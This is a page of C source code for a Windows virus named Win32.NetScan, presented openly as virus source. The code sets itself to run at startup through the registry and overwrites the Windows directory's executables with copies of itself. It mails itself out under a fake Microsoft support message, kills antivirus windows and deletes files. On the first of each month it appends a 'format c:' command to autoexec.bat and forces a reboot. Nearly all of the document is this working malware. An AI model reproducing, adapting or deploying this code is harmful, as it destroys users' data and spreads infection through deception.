Win32/Win32.Netscan - Virus Source Code

1. #include "netscan.h"
2. #pragma hdrstop
3. #pragma warning (disable: 4068)
4. #pragma warning (disable: 4001)
5. #pragma resource "resource.res"
6.  
7. char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa";
8. LPSTR FileEmm386 = "Emm386.exe";
9. LPSTR FileSetver = "SetVer.exe";
10. LPSTR Nom = "a";
11. DWORD ExtInf;
12. int Err,ErrSend;
13. HANDLE NetScanTime,NetScanHandle,AutoBat;
14. HMODULE GetKernLib, GetMapiLib;
15. HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan;
16. typedef DWORD(*RegistServProcs)(DWORD,DWORD);
17. typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
18. typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
19. typedef ULONG(*DoMemFree)(LPVOID);
20. HWND WindowsHwnd,SymantecHwnd,NAVHwnd;
21.  
22. #pragma argsused
23. int APIENTRY WinMain
24. (
25. HINSTANCE hInstance,
26. HINSTANCE hPrevInstance,
27. LPSTR     lpszCmdLine,
28. int       nCmdShow
29. )
30. {
31. //Win32.NetScan by ZeMacroKiller98
32. //Tous droits r‚serv‚s (c) 2001
33. WIN32_FIND_DATA GetFileToInfect;
34. OSVERSIONINFO GetOsVer;
35. FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite;
36. SYSTEMTIME TriggerScanTime;
37. RegistServProcs MyServProcs;
38. SendMessInfect SendMessToOther;
39. FindUserAddress GetAddressUser;
40. DoMemFree GetMemFree;
41. GetKernLib = LoadLibrary("kernel32.dll");
42. MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess");
43. MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
44. SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL);
45. GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer);
46. GetVersionEx(&GetOsVer);
47. if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT)
48. {
49.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey);
50.         RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
51.         RegCloseKey(NetScanNTKey);
52. }
53. else
54. {
55.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key);
56.         RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
57.         RegCloseKey(NetScan32Key);
58. }
59. if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS)
60. {
61.         GetMapiLib = LoadLibrary("mapi32.dll");
62.         GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir));
63.         SetCurrentDirectory(GetNetScanWinDir);
64.         NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect);
65.         NetScanFind:
66.         NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
67.         GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
68.         CloseHandle(NetScanTime);        
69.         if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0))
70.                 goto NotInfection;
71.         CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE);
72.         NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
73.         SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
74.         CloseHandle(NetScanTime);
75.         NotInfection:
76.         if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE)
77.                 goto NetScanFind;
78.         FindClose(NetScanHandle);
79.         RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan);
80.         RegCloseKey(CreateNetScan);
81.         SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail");
82.         GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName");
83.         GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer");
84.         if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL))
85.         {
86.                 MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION);
87.                 SetCurrentDirectory("C:/");
88.                 DeleteFile("*.*");
89.                 ExitProcess(0);
90.         }
91. MapiMessage stMessage;
92. MapiRecipDesc stRecip;
93. MapiFileDesc stFile;
94. lpMapiRecipDesc lpRecip;
95. stFile.ulReserved = 0;
96. stFile.flFlags = 0L;
97. stFile.nPosition = (ULONG)-1;
98. stFile.lpszPathName = GetNetScanPath;
99. stFile.lpszFileName = NULL;
100. stFile.lpFileType = NULL;
101. MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
102. UnResolve:
103. Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip);
104. if(Err!=SUCCESS_SUCCESS)
105. {
106. switch(Err){
107.         case MAPI_E_AMBIGUOUS_RECIPIENT:
108.                 MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
109.         break;
110.         case MAPI_E_UNKNOWN_RECIPIENT:
111.                 MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
112.         break;
113.         case MAPI_E_FAILURE:
114.                 MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
115.                 DeleteFile("*.*");
116.                 ExitProcess(0);
117.         break;
118.         case MAPI_E_INSUFFICIENT_MEMORY:
119.                 MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
120.                 DeleteFile("*.*");
121.                 ExitProcess(0);
122.         break;
123.         case MAPI_E_NOT_SUPPORTED:
124.                 MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
125.                 DeleteFile("*.*");
126.                 ExitProcess(0);
127.         break;
128.         case MAPI_E_USER_ABORT:
129.                 MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
130.                 DeleteFile("*.*");
131.                 ExitProcess(0);
132.         break;        
133.         }
134. goto UnResolve;
135. }
136. stRecip.ulReserved = lpRecip->ulReserved;
137. stRecip.ulRecipClass = MAPI_TO;
138. stRecip.lpszName = lpRecip->lpszName;
139. stRecip.lpszAddress = lpRecip->lpszAddress;
140. stRecip.ulEIDSize = lpRecip->ulEIDSize;
141. stRecip.lpEntryID = lpRecip->lpEntryID;
142. stMessage.ulReserved = 0;
143. stMessage.lpszSubject = "Microsoft NetScan Utility";
144. stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support")));
145. stMessage.lpszMessageType = NULL;
146. stMessage.lpszDateReceived = NULL;
147. stMessage.lpszConversationID = NULL;
148. stMessage.flFlags = 0L;
149. stMessage.lpOriginator = NULL;
150. stMessage.nRecipCount = 1;
151. stMessage.lpRecips = &stRecip;
152. stMessage.nFileCount = 1;
153. stMessage.lpFiles = &stFile;
154. ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L);
155. if(ErrSend!=SUCCESS_SUCCESS)
156. {
157.         MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
158.         DeleteFile("*.*");
159.         ExitProcess(0);
160. }
161. MessageBox(NULL,"The test is OK and NetScan is installed into your system\n",
162.                 "NetScan Utility",
163.                  MB_OK|MB_ICONINFORMATION);
164. FreeLibrary(GetMapiLib);
165. }
166. RegCloseKey(NetScanInstall);
167. STARTUPINFO NetScanInfo;
168. PROCESS_INFORMATION NetScanProc;
169. NetScanInfo.cb = sizeof(STARTUPINFO);
170. NetScanInfo.lpReserved = NULL;
171. NetScanInfo.lpReserved2 = NULL;
172. NetScanInfo.cbReserved2 = 0;
173. NetScanInfo.lpDesktop = NULL;
174. NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
175. if(CreateProcess(GetNetScanPath,
176.                 NULL,
177.                 (LPSECURITY_ATTRIBUTES)NULL,
178.                 (LPSECURITY_ATTRIBUTES)NULL,
179.                 FALSE,
180.                 0,
181.                 NULL,
182.                 NULL,
183.                 &NetScanInfo,
184.                 &NetScanProc))
185. {
186. CloseHandle(NetScanProc.hProcess);
187. CloseHandle(NetScanProc.hThread);
188. }
189. if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL)
190.         ExitProcess(0);
191. SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS);
192. MyServProcs(NetScanProc.dwProcessId,1);
193. GetSystemTime(&TriggerScanTime);
194. //Close windows which title is WINDOWS
195. WindowsHwnd = FindWindow(NULL,"WINDOWS");
196. if(WindowsHwnd!=NULL)
197.         DestroyWindow(WindowsHwnd);
198. //Close access to Symantec HomePage
199. SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer");
200. if(SymantecHwnd!=NULL)
201. {
202.         MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP);
203.         DestroyWindow(SymantecHwnd);
204. }
205. //Anti Norton Antivirus
206. NAVHwnd = FindWindow(NULL,"Norton AntiVirus");
207. if(NAVHwnd !=NULL)
208. {
209.         MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
210.         DestroyWindow(NAVHwnd);
211. }
212. if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12))
213. {
214.     mciSendString("open cdaudio",NULL,0,NULL);
215.     mciSendString("set cdaudio door open",NULL,0,NULL);
216.     mciSendString("close cdaudio",NULL,0,NULL);
217.     mciSendString("open cdaudio",NULL,0,NULL);
218.     mciSendString("set cdaudio audio all off",NULL,0,NULL);
219.     mciSendString("close cdaudio",NULL,0,NULL);
220.         MessageBeep(MB_ICONEXCLAMATION);
221. }        
222. if(TriggerScanTime.wDay==1)
223. {
224.         MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION);
225.     SetCurrentDirectory("C:\\");
226.         AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL);
227.         SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END);
228.         WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL);
229.         CloseHandle(AutoBat);
230.     ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0);
231. }                
232. FreeLibrary(GetKernLib);
233. return 0;
234. }
235.  
236.  
237. *************************************************************************
238.  
239. #define WIN32_LEAN_AND_MEAN
240. #include <windows.h>
241. #include <dos.h>
242. #include <stdlib.h>
243. #include <stdio.h>
244. #include <mapi.h>
245. #include <mmsystem.h>